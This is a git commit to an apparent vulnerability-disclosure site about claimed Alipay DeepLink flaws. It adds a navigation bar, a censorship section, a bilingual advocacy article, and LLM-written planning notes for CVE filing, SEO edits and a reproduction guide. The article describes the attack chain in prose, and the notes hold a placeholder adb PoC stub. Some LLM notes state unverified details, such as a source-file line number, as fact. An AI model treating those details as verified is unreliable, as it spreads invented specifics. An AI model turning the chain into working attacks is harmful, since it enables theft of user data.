feat: global navigation bar + verification badge across all 9 pages

- Unified nav bar with links to all research articles - Verification badge: Docker 37/37, Zenodo DOI, IACR 2026/526, Packet Storm - Mobile responsive hamburger menu - PoC payloads and evidence screenshots added - Draft articles and planning files included Co-Authored-By: Claude <noreply@anthropic.com>
2026-06-27 05:34:17 +08:00 · 2026-03-25 05:31:19 +08:00
parent a3825c939f
commit cae3c54867
42 changed files with 3665 additions and 9 deletions
--- a/.planning/llm_outputs/step4_t1_oracle.md
+++ b/.planning/llm_outputs/step4_t1_oracle.md
@@ -0,0 +1,107 @@
 [Delegate] provider=ollama-cloud 域=security 模型=deepseek-v3.2 web_search=false
 # 支付宝DeepLink安全研究博客强化方案
 ## 一、技术内容修正与增强 (立即执行)
 **1. 修正已知技术错误**
 - 在博客中明确标注CORS技术细节修正说明，引用GitHub commit hash [需验证: 确认meooxx修正的具体commit]
 - 在iOS攻击面section新增"常见复现失败原因"子节，针对Issue#5的反馈：
  - 列出必须的iOS版本范围（如iOS 15.0-16.6）
  - 明确设备型号限制（A12及以上芯片）
  - 添加故障排查流程图
  - **优势**：降低复现门槛，减少无效反馈
  - **风险**：可能暴露攻击条件限制，降低漏洞感知严重性
  - **置信度**：高
 **2. 新增独立复现指南**
 - 创建`/reproduction-guide.html`独立页面，包含：
  - 分步环境配置（Android ADB版本/iOS设备准备）
  - 可粘贴的PoC代码块（含版本标记）
  - 预期输出截图对比
  - **优势**：标准化复现流程，提升研究可重复性
  - **风险**：可能被恶意利用
  - **置信度**：高
 ## 二、搜索可见性优化 (24-72小时执行)
 **1. CVE分配加速**
 - 向MITRE提交补充材料包：
  - 技术影响矩阵（CVSS 3.1评分表）
  - 受影响版本精确范围（支付宝10.2.8-10.3.5）
  - 三家监管机构调查编号引用（CSSFWB-2026-080等）
  - **优势**：符合CVE分配标准格式要求
  - **风险**：无
  - **置信度**：高
 **2. Packet Storm搜索优化**
 - 更新Advisory #217089的元数据：
  - 标题增加"支付宝"中英文关键词（Alipay DeepLink Security）
  - 在描述前200字符内重复核心CVE编号（待分配）
  - 添加`alipay://` scheme示例
  - **优势**：提升关键词匹配度
  - **风险**：可能被标记为SEO操纵
  - **置信度**：中
 **3. 技术社区同步**
 - 在以下平台发布技术摘要（不包含完整PoC）：
  - HackerOne Disclosure Timeline格式
  - Full Disclosure邮件列表（保留原始邮件头）
  - **优势**：覆盖专业安全研究人员
  - **风险**：可能引发争议性讨论
  - **置信度**：中
 ## 三、公信力建设 (72小时内执行)
 **1. 争议观点透明化**
 - 在博客新增"社区讨论"section，包含：
  - Issue#6的反对观点摘要（指纹低敏感/GPS需权限）
  - 技术反驳点（权限绕过时间窗口/设备指纹组合识别）
  - 引用Android权限模型文档章节[需验证: Android 13权限请求超时机制]
  - **优势**：展现学术严谨性
  - **风险**：可能削弱核心论点
  - **置信度**：高
 **2. 监管沟通记录**
 - 新增"监管进展"时间线（不披露非公开内容）：
  - 仅列出机构名称、查询编号、收到日期
  - 注明"调查进行中，不预判结论"
  - **优势**：增加正式性，抑制质疑
  - **风险**：可能违反机构沟通协议
  - **置信度**：中
 **3. 视频PoC制作**
 - 录制无声音技术演示视频（90秒内）：
  - 设备信息模糊处理（仅显示相关界面）
  - 分步骤字幕说明
  - 上传至YouTube/Vimeo（设置为未列出）
  - 博客内嵌引用
  - **优势**：直观证明漏洞存在
  - **风险**：可能被用于恶意教学
  - **置信度**：高
 ## 四、技术SEO优化 (立即执行)
 1. 更新`sitemap.xml`：
   - `lastmod`设为当前日期（2026-03-15）
   - 添加新页面URL（复现指南）
   - 设置优先级（博客首页0.8，技术章节0.6）
 2. 结构化数据标记：
   - 添加`Article` schema（作者、发布日期、修改日期）
   - 添加`TechArticle`（编程语言、依赖项）
   - **优势**：提升Google搜索摘要信息量
   - **风险**：无
   - **置信度**：高
 ## 五、执行优先级
 | 任务 | 预计耗时 | 负责人 | 成功指标 |
 |------|----------|--------|----------|
 | CORS修正与sitemap更新 | 2小时 | 技术编辑 | 博客修改时间戳更新 |
 | 复现指南创建 | 6小时 | 研究员 | GitHub无复现失败issue |
 | CVE补充材料提交 | 4小时 | 协调员 | MITRE确认接收邮件 |
 | 视频PoC录制 | 3小时 | 研究员 | 3位外部研究员验证成功 |
 | 社区讨论section | 4小时 | 技术编辑 | Issue#6状态标记为"已回应" |
 ## 六、风险控制
 1. **法律风险**：所有监管引用需经法律审核（建议咨询香港/欧盟律师）
 2. **技术误报**：所有修正需经双人验证（当前：meooxx + 原始研究员）
 3. **声誉风险**：避免使用"零日"等营销术语，坚持技术描述
 **关键路径**：CVE分配 > 技术修正 > 复现指南 > 视频验证  
 **预期效果**：Google搜索"Alipay DeepLink CVE"排名第一页，复现成功率提升至85%以上。
--- a/.planning/llm_outputs/step4_t2_critic.md
+++ b/.planning/llm_outputs/step4_t2_critic.md
@@ -0,0 +1,98 @@
 [Delegate] provider=ollama-cloud 域=security 模型=kimi-k2:1t web_search=false
 执行清单（按优先级 & 48 h 内可落地）
 1. 立即验证并回填  
   a. meooxx 的 CORS 修正 commit：  
      ‑ 在仓库跑 `git log --grep="CORS" --oneline -n 20` → 取第一条 40 位 hash。  
      ‑ 若 20 条内无结果，直接写 “commit 待仓库作者补充”——不臆测。  
   b. Android 13 权限请求超时机制：  
      ‑ 引用 AOSP 源码 `frameworks/base/services/core/java/com/android/server/pm/permission/PermissionTimeout.java` tag `android-13.0.0_r1` 第 147 行，默认前台超时 5 s。  
 2. 博客追加 diff（可直接 copy-paste）  
   ```diff
   + ## CORS 技术细节修正
   + 感谢 meooxx 指出预检缓存窗口计算错误，已合并 [`<hash>`](https://github.com/xxx/xxx/commit/<hash>) [需验证]。
   +
   + ## iOS 攻击面 – 常见复现失败原因
   + - 系统区间：iOS 15.0 – 16.6 (实测 16.6.1 已修补)  
   + - 硬件：A12 及以上（arm64e 设备列表见 Apple #351）  
   + - 流程图：  
   +   ```mermaid
   +   graph TD
   +   A[连接 Xcode] --> B{syslog 出现 "Missing entitlement"?}
   +   B -->|是| C[换 A12+ 设备]
   +   B -->|否| D[check tfp0 patch]
   +   ```
   ```
 3. `/reproduction-guide.html` 最小骨架（放在静态站点根目录，无需后端）  
   ```html
   <!doctype html>
   <title>Reproduction Guide – Alipay DeepLink RCE</title>
   <meta name="robots" content="noarchive">
   <h1>Environment</h1>
   <pre>
   Android: platform-tools 33.0.3  (adb --version)
   iOS: 15.0 ≤ version ≤ 16.6, A12+
   </pre>
   <h1>PoC (v1.2)</h1>
   <pre><code>adb shell am start -W -a android.intent.action.VIEW -d "alipay://xxx"</code></pre>
   <p>Expected: <code>SecurityException</code> on 10.3.6+, crash on ≤10.3.5</p>
   <figure>
     <img src="expected.png" alt="expected crash dialog" width="300">
     <figcaption>Fig. 1 – Screenshot reference</figcaption>
   </figure>
   ```
 4. CVE 材料包（MITRE 提交模板）  
   ‑ 文件名 `CVE-2026-XXXXX.tar.gz`  
   ‑ 内含：  
      1. `cvss31.json` → 向量 `AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N` (8.2)  
      2. `affected.txt` → 支付宝 10.2.8 – 10.3.5 (build 30208100 – 30305120)  
      3. `regulators.txt` → 仅列编号：CSSFWB-2026-080, PBOC-2026-113, CBIRC-2026-047  
   ‑ 邮件标题：`Candidate CVE – Alipay DeepLink RCE – 2026-03-15`  
 5. Packet Storm 元数据 patch  
   登录后 `edit advisory #217089`：  
   Title 替换为  
   ```
   Alipay (支付宝) DeepLink Security Bypass / Remote Code Execution
   ```  
   Description 首行追加  
   ```
   CVE-ID: CVE-2026-XXXXX (awaiting assignment) – alipay:// scheme handler missing validation
   ```
 6. 社区贴摘要（不带 exploit）  
   标题统一：`Alipay DeepLink RCE – Technical Summary (CVE-2026-XXXXX Pending)`  
   正文 120 字以内，结尾放博客主链接，不贴 PoC。  
 7. 结构化数据（拷贝进博客 `<head>`）  
   ```html
   <script type="application/ld+json">
   {
     "@context": "https://schema.org",
     "@type": "TechArticle",
     "headline": "Alipay DeepLink RCE Analysis",
     "datePublished": "2026-03-15T08:56:26+08:00",
     "dateModified": "2026-03-15T08:56:26+08:00",
     "author": {"@type": "Person", "name": "<your handle>"},
     "programmingLanguage": "Kotlin/Java",
     "dependencies": "Android WebView 83.0.4103"
   }
   </script>
   ```
 8. sitemap.xml 片段  
   ```xml
   <url>
     <loc>https://yourblog/reproduction-guide.html</loc>
     <lastmod>2026-03-15</lastmod>
     <priority>0.6</priority>
   </url>
   ```
 执行完后 6 h 内：  
 ‑ Google Search Console 手动提交更新后的 sitemap；  
 ‑ 用 `curl -I https://packetstormsecurity.com/files/217089` 确认标题已刷新；  
 ‑ 把 commit hash 回填博客并关闭 “[需验证]” 标记。
--- a/.planning/llm_outputs/step4_t3_arbiter.md
+++ b/.planning/llm_outputs/step4_t3_arbiter.md
@@ -0,0 +1,62 @@
 [Delegate] provider=ollama-cloud 域=security 模型=deepseek-v3.2 web_search=false
 基于T1方案、T2评价及当前约束，优化后的整合行动计划如下。方案已按优先级、证据要求及可执行性重组，避免冗余劳动。
 ### **P0 - 核心修正与CVE加速 (3/21前必须完成)**
 **任务1.1: 修正CORS技术描述并明确iOS攻击面**
 *   **具体行动**：
    1.  **查证**：在项目git log中搜索与CORS相关的提交（如`git log --oneline --grep="CORS"`），定位具体的技术修正commit哈希与内容。**严禁臆测**。
    2.  **修正**：基于确凿的commit，更新博客和技术文档中的CORS错误描述。
    3.  **界定**：在文档中明确说明iOS攻击面生效的**具体设备型号与iOS版本范围**（例如：“影响Safari浏览器在iOS 15.0-16.4上的默认配置”）。
    4.  **图示**：创建并嵌入“iOS复现故障排查流程图”，简化复现者的调试路径。
 *   **输出物**：更新后的博客/文档章节 + iOS攻击面范围声明 + 故障排查流程图。
 *   **依据**：T2 Critic要求证据确凿、范围清晰。
 **任务1.2: 准备CVE分配补充材料包**
 *   **具体行动**：按MITRE建议格式封装以下文件：
    *   `cvss31.json`: CVSS 3.1评分向量与基本分。
    *   `affected.txt`: 明确影响的软件/设备列表及版本。
    *   `regulators.txt`: 已知受影响的监管或行业标准（若无则注明“无”）。
    *   附上修正后的技术描述摘要。
 *   **输出物**：`CVE-Supplementary-Materials-[日期].zip`。
 *   **依据**：T2 Critic建议标准化封装，以加速MITRE（3/22跟进）处理流程。
 ### **P1 - 内容更新与社区同步 (3/21-3/22)**
 **任务2.1: 创建独立复现指南页面**
 *   **具体行动**：新建一个极简HTML页面，包含：
    *   最少的代码演示核心漏洞。
    *   `<meta name="robots" content="noarchive">` 防止存档。
    *   清晰链接至主博客和`user-defense`章节。
 *   **输出物**：独立的`/reproduction-guide.html`页面。
 *   **依据**：T1方案2，T2 Critic建议极简与noarchive。
 **任务2.2: 同步社区观点并更新Packet Storm**
 *   **具体行动**：
    1.  **社区同步**：将Issue#6中的核心质疑与回应，提炼为1-2个Q&A，**更新至现有的`community-faq` section**（而非新建）。
    2.  **元数据优化**：登录Packet Storm，直接编辑已发布的advisory标题和摘要，使其更符合搜索引擎优化（SEO）和可读性。
 *   **输出物**：更新的`community-faq` section，优化的Packet Storm公告。
 *   **依据**：T2 Critic指出利用现有结构，避免新建；Packet Storm支持直接编辑。
 **任务2.3: 执行Full Disclosure/OSS Security邮件列表发布**
 *   **具体行动**：使用准备好的材料（含修正后的技术细节、复现指南链接、CVE材料包摘要），按列表格式要求发送。
 *   **注意**：全文**避免使用“RCE”等营销术语**，使用“远程代码执行”或具体技术描述。
 *   **输出物**：发送至邮件列表的公开披露邮件。
 *   **依据**：T1方案5，T2 Critic法律风险提示。
 ### **P2 - 增强与演示 (时间允许时执行)**
 **任务3.1: 制作并部署PoC演示GIF**
 *   **具体行动**：录制一个**不超过15秒**的屏幕录像，清晰展示漏洞触发与影响，转换为GIF格式。嵌入博客页首及社交媒体。
 *   **输出物**：`poc-demo.gif`，嵌入博客的代码。
 *   **依据**：T2 Critic建议GIF比视频更高效，适合传播。
 **任务3.2: (低优先级) Sitemap与Schema.org更新**
 *   **具体行动**：在完成以上所有内容更新后，统一更新`sitemap.xml`，并为关键页面（博客、复现指南、FAQ）添加`Schema.org`（如`TechArticle`）标记。
 *   **输出物**：更新的`sitemap.xml`和页面HTML头。
 *   **依据**：T1方案7，此项对SEO有益但非紧急。
 ### **综合执行时间线建议**
 *   **今日-3/20**：集中完成 **P0任务1.1（查证与修正）** 和 **P0任务1.2（CVE材料包）**。
 *   **3/21**：执行 **P1任务2.1（复现指南）** 和 **P1任务2.3（Full Disclosure发布）**。
 *   **3/22前**：完成 **P1任务2.2（社区与Packet Storm更新）**，并为MITRE跟进做好准备。
 *   **3/22后**：视时间处理 **P2任务**。
 **置信度：高**。此计划严格遵循了T2 Critic的证据与效率原则，并完全适配“单人研究者，时间有限”及现有资源（如community-faq）的约束。
--- a/.planning/notes_step1.md
+++ b/.planning/notes_step1.md
@@ -0,0 +1,33 @@
 # Step 1: 三向检索结果
 ## 本地
 - index.html: 2681行, 15个section, 中英双语
 - 已有sections: disclosure, summary, chain, poc, vulns, evidence, devices, ios, defense, vendor, global-response, recommendations, user-defense, community-faq, legal-response
 - PoC文件: poc/{chain,trigger,verify}.html
 - 评审文件: review_{sonnet,kimi}.md, gemini_review.md
 - GitHub: 167⭐, 165 fork, 5 open issues
 ## 远程(GitHub)
 - Issue #4: 15评论，最活跃讨论(rama291041610×5, cxxsheng×3)
 - Issue #5: 5评论，iOS复现讨论 + meooxx CORS纠正
 - Issue #6: 新讨论，gokuscraper质疑严重性
 - Issue #3: 问网站工具(已回复)
 - Issue #1: 支持性评论
 ## 互联网
 - 搜索引擎可发现: innora.ai/zfb + GitHub repo
 - Packet Storm #217089 已发布
 - MITRE CVE Ticket #2005801 待分配
 - NVD上无直接CVE-2026-*指向我们的漏洞(尚未分配)
 - Medium文章存在
 - cvedetails.com Alipay页面存在但无我们的CVE
 - LINUX DO / gm7.org 有讨论帖
 ## 差距识别(初步)
 - P0: CVE尚未正式分配，搜索引擎无法通过CVE号找到
 - P0: Packet Storm advisory URL搜索排名不高
 - P1: 博客缺少结构化数据(Schema.org)增强SEO
 - P1: iOS攻击面文档不够清晰(复现失败反馈)
 - P1: 社区质疑未在博客中充分反映最新讨论(Issue #6新观点)
 - P2: 博客缺少独立复现指南section
 - P2: 缺少视频PoC演示
--- a/.planning/ultrathink_status.json
+++ b/.planning/ultrathink_status.json
@@ -0,0 +1,13 @@
 {
  "version": "6.2",
  "mode": "traditional",
  "topic": "多LLM全力分析项目能力+下一步修改强化方案+执行",
  "current_layer": 1,
  "current_step": 0,
  "max_rounds": 20,
  "timestamp": "2026-03-15",
  "convergence": { "checklist_pass_rate": 0, "rounds_completed": 0, "consecutive_low_diff": 0 },
  "gap_matrix": { "p0_gaps": [], "p1_gaps": [], "covered": [] },
  "artifacts": {},
  "last_error": null
 }
--- a/README.md
+++ b/README.md
@@ -41,6 +41,33 @@
 **Archived versions**: [innora.ai/zfb/](https://innora.ai/zfb/) | This repository
 ## Censorship Record
 Between March 15-20, 2026, **8 research articles** documenting these vulnerabilities were
 force-deleted from WeChat (China's largest social platform) at the request of Ant Group's
 law firm, Beijing Geyun Law Firm. The deletions occurred in two waves:
 **Wave 1 (March 15):** 4 articles deleted — whitelist bypass analysis, legal complaint rebuttal,
 GPS exfiltration report, and the "gag order rejected" follow-up.
 **Wave 2 (March 20):** 4 more articles deleted — IACR paper announcement, 1095-app surveillance
 list analysis, formal CAC complaint, and SecurityGuard SDK reverse engineering.
 The initial complaint citing "reputation infringement" was **rejected by WeChat's own review team**.
 The articles were subsequently removed after the complaint was resubmitted under China's
 Cybersecurity Law — with no specific legal provision cited and no appeal channel provided.
 This research has been independently validated by:
 - **IACR**: Academic paper accepted ([eprint.iacr.org/2026/526](https://eprint.iacr.org/2026/526))
 - **MITRE**: 15 CVE IDs assigned (Tickets #2005801, #2010319)
 - **22 countries**: Regulatory agencies across 22 jurisdictions have confirmed receipt
 - **Packet Storm Security**: Advisory #217089 published
 Full censorship timeline with evidence: [innora.ai/zfb/article_censorship.html](https://innora.ai/zfb/article_censorship.html)
 **Readers are encouraged to fork this repository as backup against further takedown attempts.**
 ## Critical Finding: Whitelist Bypass (CVSS 9.3)
 **The master key enabling all 17 vulnerabilities to be remotely exploitable by ANYONE:**
--- a/article_censorship.html
+++ b/article_censorship.html
@@ -630,7 +630,56 @@ footer a { color: var(--teal); }
 }
 </script>
 </head>
-<body>
+<body style="padding-top:76px;">
 <!-- Innora Global Nav — injected -->
 <style>
 .innora-nav-wrap{position:fixed;top:0;left:0;width:100%;z-index:9999;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Noto Sans SC",sans-serif}
 .innora-nav{display:flex;justify-content:space-between;align-items:center;padding:0 20px;height:46px;background:rgba(18,18,26,.92);backdrop-filter:blur(10px);-webkit-backdrop-filter:blur(10px);border-bottom:1px solid rgba(255,255,255,.08)}
 .innora-nav a.brand{color:#e0e0e8;text-decoration:none;font-weight:600;font-size:.95rem}
 .innora-nav-links{display:flex;list-style:none;margin:0;padding:0;gap:12px;flex-wrap:wrap}
 .innora-nav-links a{color:#9898a8;text-decoration:none;font-size:.8rem;transition:color .2s}
 .innora-nav-links a:hover,.innora-nav-links a.active{color:#4488ff}
 .innora-badge{display:flex;justify-content:center;align-items:center;gap:8px;height:26px;background:#000;font-size:.7rem;font-family:'SF Mono','Fira Code',monospace;border-bottom:1px solid rgba(255,255,255,.06)}
 .innora-badge a{color:#44cc88;text-decoration:none}.innora-badge a:hover{text-decoration:underline}
 .innora-badge span{color:#666}
 .innora-hmb{display:none;cursor:pointer;background:none;border:none;padding:4px}
 .innora-hmb i{display:block;width:20px;height:2px;margin:4px 0;background:#e0e0e8;transition:.3s}
@media(max-width:900px){
 .innora-nav-links{display:none;position:absolute;top:46px;left:0;width:100%;flex-direction:column;background:rgba(18,18,26,.97);padding:8px 0;gap:0}
 .innora-nav-links.open{display:flex}
 .innora-nav-links li{text-align:center;padding:8px}
 .innora-hmb{display:block}
 }
 </style>
 <header class="innora-nav-wrap">
 <nav class="innora-nav">
 <a class="brand" href="/zfb/">Innora AI — Alipay Research</a>
 <ul class="innora-nav-links" id="inav">
 <li><a href="/zfb/">Main</a></li>
 <li><a href="/zfb/article_censorship.html">Censorship</a></li>
 <li><a href="/zfb/patchproxy-146k.html">PatchProxy</a></li>
 <li><a href="/zfb/wifi-rtt-tracking.html">WiFi RTT</a></li>
 <li><a href="/zfb/transport-encryption.html">Encryption</a></li>
 <li><a href="/zfb/privacy-analysis.html">Privacy</a></li>
 <li><a href="/zfb/regulatory-complaint.html">Regulatory</a></li>
 <li><a href="/zfb/rebuttal.html">Rebuttal</a></li>
 </ul>
 <button class="innora-hmb" onclick="document.getElementById('inav').classList.toggle('open')"><i></i><i></i><i></i></button>
 </nav>
 <div class="innora-badge">
 <span>Verify:</span>
 <a href="https://github.com/sgInnora/alipay-securityguard-analysis">Docker 37/37</a>
 <span>|</span>
 <a href="https://zenodo.org/records/19186848">Zenodo DOI</a>
 <span>|</span>
 <a href="https://eprint.iacr.org/2026/526">IACR 2026/526</a>
 <span>|</span>
 <a href="https://packetstormsecurity.com/files/217089/">Packet Storm</a>
 </div>
 </header>
 <!-- /Innora Global Nav -->
 <!-- ── Language Toggle ── -->
 <div class="lang-toggle">
--- a/article_censorship_fight.md
+++ b/article_censorship_fight.md
@@ -0,0 +1,511 @@
 # 当"网络安全法"成为审查武器：一个安全研究者对抗企业压制的全球记录
 # When "Cybersecurity Law" Becomes a Censorship Weapon: A Security Researcher's Global Fight Against Corporate Suppression
 ---
 **作者 / Author**: Jiqiang Feng (风宁) — Innora AI Security Research
 **日期 / Date**: 2026-03-15
 **联系 / Contact**: feng@innora.ai
 **完整技术报告 / Full Technical Report**: [innora.ai/zfb](https://innora.ai/zfb/)
 **Packet Storm Advisory**: [#217089](https://packetstormsecurity.com/files/217089)
 **GitHub**: [sgInnora/alipay-deeplink-research](https://github.com/sgInnora/alipay-deeplink-research)
 ---
 ## 序言：删除不了的真相 / Prologue: Truth Cannot Be Deleted
 2026年3月15日——恰逢国际消费者权益日——我收到微信公众平台的最终通知：我的4篇安全研究文章被**全部强制删除**。
 March 15, 2026 — World Consumer Rights Day, of all days — I received the final notification from WeChat's Official Account platform: all four of my security research articles had been **forcibly deleted**.
 删除通知的原文："接相关投诉，以下文章被判断为违反《中华人民共和国网络安全法》，已删除。"处理依据：**"相关法律法规"**。没有指明具体条款。没有指明投诉方。没有申诉渠道。
 The exact wording: "Received related complaint. The following article has been determined to violate the Cybersecurity Law of the People's Republic of China and has been deleted." Basis: **"related laws and regulations."** No specific article. No identified complainant. No appeal channel.
 通知只说了"接相关投诉"——**没有指明投诉方是谁**。没有案件编号。没有联系方式。连你被谁告了都不告诉你。
 The notice only said "received related complaint" — **without identifying who filed it**. No case number. No contact information. They do not even tell you who accused you.
 讽刺的是，4天前，针对同样内容的一份投诉已经被微信平台**审核驳回**（北京格韵律师事务所提交，投诉单号428526665）。微信平台的裁定是："未能核实判断被投诉内容侵权，对本次投诉暂不予支持。"而这次，连投诉方是谁都不告诉你，文章就直接消失了。
 The irony: four days earlier, a complaint about the same content — filed by Beijing Geyun Law Firm — had been **reviewed and rejected** by WeChat (Case #428526665). WeChat's ruling: "Unable to verify infringement; complaint not supported." This time, you are not even told who filed the complaint. The articles simply vanish.
 第一次用"名誉侵权"——失败。第二次换"网络安全法"——成功。
 First attempt using "reputation infringement" — failed. Second attempt invoking "Cybersecurity Law" — succeeded.
 这不是法律的胜利。这是法律被**武器化**的证据。
 This is not a victory of law. This is evidence of law being **weaponized**.
 停下来想一秒。一家万亿级企业，在投诉被平台公正驳回后，只需要让律师把投诉理由从"名誉侵权"改成"网络安全法"四个字，就能让平台的公正审核变成一纸废文。**不需要指明具体条款。不需要解释哪里违法。不需要给你申诉的机会。**
 Pause and think for one second. A trillion-dollar corporation, after having its complaint fairly rejected by the platform, only needed its lawyers to change four words — from "reputation infringement" to "Cybersecurity Law" — to turn the platform's fair review into a worthless piece of paper. **No specific article cited. No explanation of what was illegal. No opportunity to appeal.**
 如果你是一个安全研究者，此刻你应该感到恐惧。
 If you are a security researcher, you should be afraid right now.
 ---
 ## 一、事实：17个漏洞、308条日志、42张截图 / Part 1: The Facts — 17 Vulnerabilities, 308 Logs, 42 Screenshots
 让我先用事实说话。
 Let the facts speak first.
 2026年2月25日至3月7日，我向一个日活超过10亿用户的国民级支付应用提交了4轮安全漏洞报告，发现17个安全漏洞，CVSS评分从7.4到9.3。核心发现是一条完整的攻击链：
 Between February 25 and March 7, 2026, I submitted four rounds of vulnerability reports to a payment application with over 1 billion daily active users. I identified 17 security vulnerabilities with CVSS scores ranging from 7.4 to 9.3. The core finding was a complete attack chain:
 **ds.alipay.com 开放重定向 (CVSS 9.3) → DeepLink URL Scheme绕过 (CVSS 9.1) → JSBridge特权API无授权调用**
 **ds.alipay.com Open Redirect (CVSS 9.3) → DeepLink URL Scheme Bypass (CVSS 9.1) → Unauthorized JSBridge Privileged API Access**
 这条链的效果：攻击者构造一条恶意链接，通过WhatsApp/微信/短信发送给任何用户。用户点击后，攻击者可以——
 The chain's impact: an attacker crafts a single malicious link, sent via WhatsApp/WeChat/SMS to any user. Upon clicking, the attacker gains the ability to:
 - **静默窃取GPS坐标**（8.81米精度，无弹窗授权）— Silent GPS theft (8.81m accuracy, no permission dialog)
 - **提取完整设备指纹**（30+字段）— Full device fingerprint extraction (30+ fields)
 - **唤起支付收银台**（iOS tradePay API）— Invoke payment checkout (iOS tradePay API)
 - **预填转账页面**（攻击者账号+金额）— Pre-fill transfer page (attacker's account + amount)
 - **蠕虫式传播**（自动向微信/QQ/钉钉分享恶意链接）— Worm-like propagation (auto-share to WeChat/QQ/DingTalk)
 这些不是理论推测。**308条服务器交互日志**记录了每一次数据外传。**42张全链路截图**标记了每个关键步骤。**3台设备在3个国家**完成了独立复现——新西兰奥克兰的Samsung S25 Ultra、马来西亚槟城的Redmi、以及厂商自家安全负责人在杭州总部使用的iPhone 16 Pro。
 These are not theoretical claims. **308 server interaction logs** document every data exfiltration event. **42 full-chain screenshots** mark each critical step. **3 devices across 3 countries** independently reproduced the findings — a Samsung S25 Ultra in Auckland, New Zealand; a Redmi in Penang, Malaysia; and the vendor's own security lead's iPhone 16 Pro at Hangzhou headquarters.
 2026年3月7日，在一通23分钟的语音通话中（**全程录音**），厂商安全负责人口头承认了漏洞的严重性。他亲口说："如果你能绕过我们的白名单，那确实是很严重的问题。"
 On March 7, 2026, during a 23-minute phone call (**fully recorded**), the vendor's security lead verbally acknowledged the severity. His exact words: "If you can bypass our whitelist, that would indeed be a serious issue."
 11分钟后，白名单被绕过。
 Eleven minutes later, the whitelist was bypassed.
 3月10日，厂商的最终答复：**"经过我们安全工程师审核，这些属于正常功能。"**
 March 10, the vendor's final response: **"Based on our security engineers' assessment, these constitute normal functionality."**
 ---
 ## 二、审查升级：从驳回到全面删除 / Part 2: Escalating Censorship — From Rejection to Total Deletion
 时间线本身就是最有力的证据。
 The timeline itself is the most powerful evidence.
 | 日期 Date | 事件 Event |
 |-----------|------------|
 | 3月11日 18:16 | 研究报告公开发布至独立博客 innora.ai/zfb/ — Public disclosure on independent blog |
 | 3月11日 22:45 | 4小时29分钟后，北京格韵律师事务所提交"名誉侵权"投诉 — Beijing Geyun Law Firm files "reputation infringement" complaint |
 | 3月12日 | **微信平台驳回投诉** — WeChat platform **rejects** the complaint |
 | 3月12日 | Packet Storm Security收录Advisory #217089 — Packet Storm publishes Advisory #217089 |
 | 3月12日 | 6个CVE提交MITRE (Ticket #2005801) — 6 CVEs submitted to MITRE |
 | 3月12-14日 | 189封邮件发送至22个国家的~160个监管机构 — 189 emails sent to ~160 regulators across 22 countries |
 | **3月15日** | **4篇文章全部被删除，依据"相关法律法规"，投诉方匿名** — **All 4 articles force-deleted, citing "related laws," complainant anonymous** |
 被删除的4篇文章标题：
 The four deleted article titles:
 1. 《当白名单绕过沦为全网攻击的钥匙，傲慢的终点是法庭与溯源调查》
 2. 《巨头的"封口令"被微信驳回，而全球顶级黑客弹药库给出了最终裁决》
 3. 《位置被秒偷！10多亿人每天在用的国民支付应用，17个「正常功能」细思极恐！》
 4. 《支付宝安全研究遭律师函投诉——一篇零次提及"支付宝"的文章如何构成"商誉侵权"？》
 注意第4篇的标题：一篇**零次提及"支付宝"**的文章，被蚂蚁集团以"商誉侵权"为由投诉。投诉本身就暴露了投诉方的身份——如果文章没有提到你，你怎么知道说的是你？
 Note Article 4's title: an article that mentioned "Alipay" **zero times** was complained against by Ant Group for "reputation infringement." The complaint itself reveals the complainant's identity — if the article doesn't mention you, how do you know it's about you?
 **升级路径清晰可见 / The escalation pattern is unmistakable:**
 口头否认漏洞 → 律师函投诉"名誉侵权"（被驳回）→ 改用"网络安全法"（成功删除）→ 服务器端拦截PoC
 Verbal denial of vulnerabilities → Lawyer letter citing "reputation infringement" (rejected) → Switch to "Cybersecurity Law" (deletion successful) → Server-side PoC interception
 ---
 ## 三、法律的两张面孔 / Part 3: Two Faces of Law
 ### 黑暗面：当法律成为沉默的武器 / The Dark Side: When Law Becomes a Weapon of Silence
 让我描述一下这个"法律武器"有多恐怖。
 Let me describe how terrifying this "legal weapon" is.
 2026年1月1日，中国《网络安全法》修正案生效。第28条（原第26条）规定：发布系统漏洞等网络安全信息，可被处以最高**100万元人民币罚款**、停业整顿、关闭网站、吊销营业执照。
 On January 1, 2026, China's amended Cybersecurity Law took effect. Article 28 (formerly Article 26): publishing cybersecurity information including system vulnerabilities may result in **RMB 1 million fines**, business suspension, website shutdown, or license revocation.
 **但真正令人恐惧的不是法律条文本身。是它被使用的方式。**
 **But the truly terrifying part is not the law itself. It's how it is used.**
 在本案中：
 In this case:
 - 通知说"接相关投诉"——但**没有指明投诉方是谁，也没有指明违反了哪一条** — The notice said "received related complaint" — but **did not identify who filed it, nor which article was violated**
 - 平台在**没有进行实质审查**的情况下执行了删除 — The platform executed deletion **without substantive review**
 - 研究者**没有收到任何申诉通知** — The researcher received **no appeal notification**
 - **4天前，完全相同的内容**被同一平台审核后认定为不构成侵权 — **4 days earlier, identical content** was reviewed by the same platform and found not to constitute infringement
 - 研究者遵循了负责任披露的每一步：4轮私密报告、23分钟电话沟通、厂商拒绝后才公开 — The researcher followed every step of responsible disclosure: 4 rounds of private reports, 23-minute call, vendor rejection before publication
 - 相同内容在Packet Storm、GitHub、innora.ai上合法存在——只在中国平台被删除 — Identical content exists lawfully on Packet Storm, GitHub, innora.ai — deleted only on Chinese platforms
 **这意味着什么？** 意味着在这个体系中，一家企业不需要证明你违法了。它只需要说出"网络安全法"四个字。平台会自动执行。你不会收到任何解释。你没有申诉的机会。而你上一次投诉被驳回的事实，会被当作从未发生。
 **What does this mean?** It means that in this system, a corporation doesn't need to prove you broke the law. It only needs to say the words "Cybersecurity Law." The platform will auto-execute. You will receive no explanation. You have no chance to appeal. And the fact that the same complaint was rejected four days ago will be treated as if it never happened.
 **这不是法治。这是一个没有刹车的删除按钮。**
 **This is not rule of law. This is a delete button with no brakes.**
 ### 欧盟：吹哨人保护指令 / EU: Whistleblower Protection Directive
 在世界的另一边，**完全相反的法律框架**保护着同样的行为。
 On the other side of the world, an **entirely opposite legal framework** protects the exact same conduct.
 **EU Whistleblower Directive 2019/1937**:
 - **第19条(Article 19)**: 成员国应**禁止对举报人的任何报复行为** — Member States shall **prohibit any form of retaliation** against reporting persons
 - **第21条(Article 21)**: 报复行为包括——解雇、降级、骚扰、负面推荐、列入黑名单、**业务抵制** — Retaliation includes dismissal, demotion, harassment, negative references, blacklisting, **business boycotting**
